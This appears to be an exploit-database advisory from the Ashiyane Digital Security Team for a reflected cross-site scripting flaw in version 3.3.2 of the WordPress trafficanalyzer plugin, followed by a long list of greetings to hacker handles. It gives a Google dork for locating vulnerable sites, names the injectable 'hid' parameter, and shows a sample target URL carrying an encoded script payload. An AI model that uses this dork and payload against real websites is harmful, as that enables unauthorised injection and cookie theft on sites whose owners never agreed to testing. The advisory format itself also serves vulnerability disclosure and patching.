# Exploit Title: Wordpress trafficanalyzer Plugin Xss ((|))
# Vulnerability ((|))
# Google Dork:inurl:js/ta_loaded.js.php?hid= ext:php #
# Download :http://wordpress.org/extend/plugins/trafficanalyzer/#
# Vendor Home page: http://wptrafficanalyzer.in #
# Version: 3.3.2 #
# Exploit Author: Ashiyane Digital Security Team #
# Category: Web Application #
# Tested on: Windows 7 #
#******************************((|))****************************#
#* Exploit : Put [Xss] after #
#* hid= like this : =>[ta_loaded.js.php?hid=[xss] #
#* Target : #
#* http://jaXXorel.com/wp-content/plugins/trafficanalyzer/js/ #
#* ta_loaded.js.php?hid= #
#* %3CScript%3Ealert%28document.coockie%29%3C/Script%3E #
#* ***************** #
#* * * #
#* Greetz to: * My lord ALLAH * #
#* * * #
#* ***************** #
#* **((|))** #
#* Sp Tnx To: Muslims From All Over The World #
#* Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,,ERroR #
#* 0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,AR455,Azad #
#* Black-Hole,Classic,Encoder,HASSAN20,HidDeEn,hossein19123 #
#* jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu #
#* MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H #
#* Pr0grammer,PrinceofHacking,Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3#
#* The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X ((|)) #
#* Crypt0,Milad22,MR.Vinci,Pirjo,V1R4N64R * ((|)) * #
#* And All Of My Friends -|- ((|)) -|-#
#* The Last One : My Self, Milwar /|\ ((|)) /|\#